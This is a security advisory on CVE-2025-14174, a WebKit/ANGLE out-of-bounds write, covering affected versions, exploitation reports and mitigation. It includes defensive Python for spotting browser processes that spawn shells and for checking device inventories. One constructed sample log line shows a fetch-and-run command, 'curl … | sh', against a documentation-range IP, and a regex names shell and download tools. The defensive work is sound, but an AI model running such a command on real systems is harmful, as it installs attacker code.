

Apple Urgent Security Update: CVE-2025-14174 WebKit Same-Origin Policy Bypass Vulnerability Impacts iOS, macOS, Chrome, and Edge


Executive Summary

Apple has released security updates for CVE-2025-14174, a high-severity WebKit vulnerability that attackers can use to bypass the Same-Origin Policy (SOP) on iOS and macOS. Every browser on iOS and iPadOS must use WebKit as its rendering engine, so the flaw affects all of them, not only Safari, together with every other Apple platform that renders web content. The defect sits in ANGLE, a graphics abstraction layer that WebKit shares with Chromium, so Google Chrome and Microsoft Edge carried the same bug until their own December 2025 updates. Exploitation in the wild in highly targeted attacks has been confirmed (the CVE is listed in the CISA Known Exploited Vulnerabilities catalog), which makes prompt patching and heightened vigilance essential.

Technical Information

CVE-2025-14174 is an out-of-bounds write (CWE-787), a subclass of improper restriction of operations within the bounds of a memory buffer (CWE-119). The bug lives in ANGLE, the open-source graphics abstraction layer that both WebKit and Chromium use to translate WebGL onto native GPU APIs. When the browser renders attacker-controlled web content, a remote attacker can trigger the write to corrupt memory, bypass browser isolation and the Same-Origin Policy, and from there pursue arbitrary code execution, data theft, or further compromise of the device.

The vulnerability is reachable remotely through web content and requires user interaction: the victim has to load a page the attacker controls or has compromised. The CVSS v3.1 base score is 8.8 (High), which reflects a network-reachable, low-complexity attack that needs no privileges but does require user interaction, with high impact on confidentiality, integrity, and availability.

The root cause is a memory-safety error in how ANGLE handles certain buffer operations: a crafted sequence of WebGL calls reaches a code path that writes past the end of a buffer. Such a write lets the attacker corrupt memory in the process that hosts ANGLE (WebKit's WebContent or GPU process, Chromium's GPU process) and take control of it. That process is sandboxed, so full device compromise normally requires chaining a separate sandbox-escape or kernel privilege-escalation bug; in targeted iOS campaigns a renderer or GPU bug of this kind is typically only the first link in such a chain.

The vulnerability is not limited to Safari or WebKit-based browsers. Because ANGLE is also used in Google Chrome and Microsoft Edge, the same flaw can be exploited across multiple browsers and platforms. Google patched the issue in Chrome on December 10, 2025, and Microsoft released corresponding updates for Edge. This cross-browser impact increases the attack surface and the urgency for organizations to ensure all endpoints are updated.

The attack chain is a drive-by compromise: the victim is lured to, or transparently redirected through, a malicious page; the page triggers the vulnerability; and the resulting memory corruption is turned into code execution. If the chain goes on to escape the browser sandbox, the attacker can install spyware, steal credentials, or pivot to other parts of the device or network.

Exploitation in the Wild

Exploitation of CVE-2025-14174 has been confirmed in the wild, as documented in the CISA Known Exploited Vulnerabilities (KEV) Catalog. The attacks observed are highly targeted and sophisticated, focusing on specific individuals running vulnerable versions of iOS prior to version 26. The victim profile suggests high-value targets, such as government officials, journalists, or members of civil society organizations.

The delivery methods consistent with this kind of campaign are phishing links and watering-hole attacks, in which a legitimate website is compromised to serve the exploit only to selected visitors. Once the victim loads the malicious or compromised page, the exploit uses the ANGLE vulnerability to gain code execution; the usual payload in such campaigns is surveillance software or the exfiltration of sensitive data.

No public indicators of compromise (IOCs), such as file hashes or command-and-control domains, have been released as of this report. Detection therefore has to rely on behaviour: browser renderer or GPU processes spawning anything other than their known helper processes (shells, osascript, curl and similar tools are never legitimate children of a renderer), unusual outbound connections from Safari, Chrome, or Edge, and signs of sandbox escape or privilege escalation that follow a browsing session.
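The behavioural checks above can be expressed as a small detection rule. The following is an added example, not code from the advisory or from Rescana. It runs over constructed process-creation events in a simplified JSON-lines schema (assumed fields: ts, host, parent, child, cmdline; map them onto whatever your EDR or unified-log export provides) and flags browser renderer or GPU processes that spawn anything other than their expected helpers. The process names in the allowlists are illustrative and should be tuned to the browsers deployed in your fleet.

```python
import json
import re
from typing import Optional

# Processes that render or rasterise untrusted web content. Illustrative names;
# tune to the browsers and versions actually deployed in your fleet.
BROWSER_PARENTS = {
    "Safari", "com.apple.WebKit.WebContent", "com.apple.WebKit.GPU",
    "Google Chrome", "Google Chrome Helper (Renderer)", "Google Chrome Helper (GPU)",
    "Microsoft Edge", "Microsoft Edge Helper (Renderer)", "Microsoft Edge Helper (GPU)",
}

# Children a browser legitimately spawns. Illustrative, not exhaustive.
EXPECTED_CHILDREN = {
    "com.apple.WebKit.WebContent", "com.apple.WebKit.GPU", "com.apple.WebKit.Networking",
    "Google Chrome Helper", "Google Chrome Helper (Renderer)", "Google Chrome Helper (GPU)",
    "Microsoft Edge Helper", "Microsoft Edge Helper (Renderer)", "Microsoft Edge Helper (GPU)",
}

# Interpreters and downloaders that a renderer or GPU process has no business launching.
INTERPRETER_RE = re.compile(r"^(sh|bash|zsh|python3?|perl|ruby|osascript|curl|wget|nc|launchctl)$")


def classify(event: dict) -> Optional[str]:
    """Return None for a benign event, otherwise a one-line reason for the alert."""
    parent, child = event["parent"], event["child"]
    if parent not in BROWSER_PARENTS or child in EXPECTED_CHILDREN:
        return None
    if INTERPRETER_RE.match(child):
        return f"{parent!r} launched interpreter/downloader {child!r}: {event.get('cmdline', '')}"
    return f"{parent!r} launched unexpected child {child!r}"


def scan(lines) -> list:
    """Parse JSON-lines process-creation events; return (event, reason) for each suspicious one."""
    hits = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        event = json.loads(line)
        reason = classify(event)
        if reason is not None:
            hits.append((event, reason))
    return hits


# Constructed sample telemetry, not real data; 203.0.113.0/24 is a documentation range.
SAMPLE_LOG = """
{"ts": "2025-12-12T09:14:02Z", "host": "mbp-sec-02", "parent": "Safari", "child": "com.apple.WebKit.WebContent", "cmdline": "com.apple.WebKit.WebContent"}
{"ts": "2025-12-12T09:14:09Z", "host": "mbp-sec-02", "parent": "com.apple.WebKit.GPU", "child": "sh", "cmdline": "sh -c curl -s http://203.0.113.10/s | sh"}
{"ts": "2025-12-12T09:20:41Z", "host": "mbp-sec-02", "parent": "Google Chrome", "child": "Google Chrome Helper (Renderer)", "cmdline": "Google Chrome Helper (Renderer) --type=renderer"}
{"ts": "2025-12-12T09:21:05Z", "host": "mbp-sec-02", "parent": "Google Chrome Helper (GPU)", "child": "osascript", "cmdline": "osascript -e do shell script"}
{"ts": "2025-12-12T09:30:00Z", "host": "mbp-sec-02", "parent": "Terminal", "child": "curl", "cmdline": "curl -I https://example.com"}
"""

if __name__ == "__main__":
    for event, reason in scan(SAMPLE_LOG.splitlines()):
        print(event["ts"], event["host"], reason)
```

Two practical caveats when wiring this to real telemetry: on macOS, WebKit's WebContent and GPU processes are XPC services whose parent in the raw process tree is launchd, so build the parent field from the telemetry's "responsible process" attribute rather than the bare parent PID; and the Chromium helpers fork directly from the browser binary, so for Chrome and Edge the raw parent is sufficient.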

APT Groups using this vulnerability

As of this report, there is no public attribution of CVE-2025-14174 exploitation to a specific Advanced Persistent Threat (APT) group. The vulnerability was jointly discovered by Apple Security Engineering and Architecture and the Google Threat Analysis Group, both of which have a history of tracking nation-state actors and sophisticated cyber adversaries. The nature of the attacks—highly targeted, leveraging zero-day exploits, and focusing on high-value individuals—strongly suggests involvement by nation-state actors or advanced persistent threat groups.

The exploitation techniques align with several MITRE ATT&CK tactics and techniques, including T1189 (Drive-by Compromise), T1203 (Exploitation for Client Execution), and T1071 (Application Layer Protocol) for command-and-control communications post-exploitation. While no specific APT group has been named, organizations should assume that actors with significant resources and technical capabilities are leveraging this vulnerability in ongoing campaigns.

Affected Product Versions

The following product versions are affected by CVE-2025-14174. iOS and iPadOS: the 18.x branch before 18.7.3, and the 26.x branch before 26.2 (26.0 and 26.1 together with their point releases), fixed in 18.7.3 and 26.2 respectively. macOS, tvOS, watchOS, visionOS, and Safari: all versions before 26.2. Google Chrome and Microsoft Edge: every build that ships the vulnerable ANGLE library, that is, anything older than the vendors' December 2025 security updates.

Organizations should conduct a comprehensive inventory of all endpoints, including mobile devices, desktops, and managed browsers, to identify and remediate any systems running affected versions.
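The version ranges above can be turned into a check that runs over an inventory export. This is an added example, not code from the advisory or from Rescana; the cut-offs are the ones stated in this section and the inventory rows are constructed. Note the branch handling for iOS and iPadOS, where a device on 26.1 is vulnerable even though 26.1 sorts above the 18.7.3 fix. Chrome and Edge have no numeric cut-off on this page, so the check reports them as "verify against vendor release notes" rather than guessing a build number.

```python
from typing import Optional


def parse_version(text: str) -> tuple:
    """'18.7.3' -> (18, 7, 3). A trailing build tag after whitespace, e.g. '26.1.1 (build tag)', is dropped."""
    parts = text.strip().split()
    if not parts:
        raise ValueError("empty version string")
    return tuple(int(part) for part in parts[0].split(".") if part.isdigit())


# Per product, the (branch_floor, first_fixed) ranges from the advisory. A version is affected
# when branch_floor <= version < first_fixed. iOS and iPadOS have two supported branches.
AFFECTED_RANGES = {
    "iOS":      [((0,), (18, 7, 3)), ((26,), (26, 2))],
    "iPadOS":   [((0,), (18, 7, 3)), ((26,), (26, 2))],
    "macOS":    [((0,), (26, 2))],
    "tvOS":     [((0,), (26, 2))],
    "watchOS":  [((0,), (26, 2))],
    "visionOS": [((0,), (26, 2))],
    "Safari":   [((0,), (26, 2))],
}


def is_affected(product: str, version: str) -> Optional[bool]:
    """True/False when the advisory gives a numeric cut-off for the product, None otherwise
    (Chrome and Edge: compare against the vendors' December 2025 release notes instead)."""
    ranges = AFFECTED_RANGES.get(product)
    if ranges is None:
        return None
    v = parse_version(version)
    return any(floor <= v < fixed for floor, fixed in ranges)


def remediation_plan(rows):
    """Split inventory rows (asset, product, version) into assets to patch now and assets to check manually."""
    patch, check = [], []
    for asset, product, version in rows:
        state = is_affected(product, version)
        if state is True:
            patch.append(asset)
        elif state is None:
            check.append(asset)
    return patch, check


# Constructed sample inventory export, not real data.
INVENTORY = [
    ("iphone-exec-01", "iOS",    "26.1"),
    ("ipad-legal-04",  "iPadOS", "18.7.2"),
    ("ipad-legal-05",  "iPadOS", "18.7.3"),
    ("mbp-sec-01",     "macOS",  "26.2"),
    ("mbp-sec-02",     "macOS",  "26.1.1 (build tag)"),
    ("win-fin-09",     "Chrome", "see release notes"),
]

if __name__ == "__main__":
    to_patch, to_check = remediation_plan(INVENTORY)
    print("patch now:", to_patch)
    print("verify against vendor release notes:", to_check)
```

Python compares tuples element by element, so (26, 1, 1) < (26, 2) and (18, 7) < (18, 7, 3) behave as a version comparison should; the only input that needs care is a build tag appended after the version, which parse_version strips.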

Workaround and Mitigation

The primary mitigation for CVE-2025-14174 is to apply the latest security updates provided by Apple, Google, and Microsoft. All users and administrators should ensure that iOS, iPadOS, macOS, tvOS, watchOS, visionOS, Safari, Google Chrome, and Microsoft Edge are updated to the latest versions that include the patch for this vulnerability.

For organizations using Mobile Device Management (MDM) solutions, it is critical to enforce update policies that prevent users from deferring or blocking critical security updates. Administrators should monitor for anomalous browser or network activity, particularly on high-risk or high-value endpoints, as exploitation attempts may persist even after patches are released.

User awareness is also essential. Users should be informed about the risks of visiting unknown or suspicious websites, especially until all patches are applied across the organization. Where possible, restrict access to untrusted web content and implement network monitoring to detect signs of exploitation or data exfiltration.

No effective workaround exists other than patching, as the vulnerability is inherent to the browser rendering engine and graphics library. Disabling JavaScript or WebGL may reduce the attack surface but is not a practical solution for most users and organizations.

References

SOC Prime: CVE-2025-14174 Vulnerability Analysis
NVD: CVE-2025-14174
CISA KEV Catalog: CVE-2025-14174
Chrome Release Notes: Stable Channel Update for Desktop
Edge Security Release Notes: Microsoft Edge Security Updates
MITRE ATT&CK: T1189, T1203, T1071
Apple Security Updates: Apple HT201222
Chromium Issue Tracker: 466192044

Rescana is here for you

Rescana is committed to helping organizations navigate the evolving threat landscape. Our Third-Party Risk Management (TPRM) platform empowers security teams to continuously assess, monitor, and manage cyber risk across their digital ecosystem. We provide actionable intelligence, automated risk scoring, and deep visibility into your supply chain, enabling you to make informed decisions and respond rapidly to emerging threats. If you have any questions about this advisory or require further assistance, our experts are happy to help at ops@rescana.com.
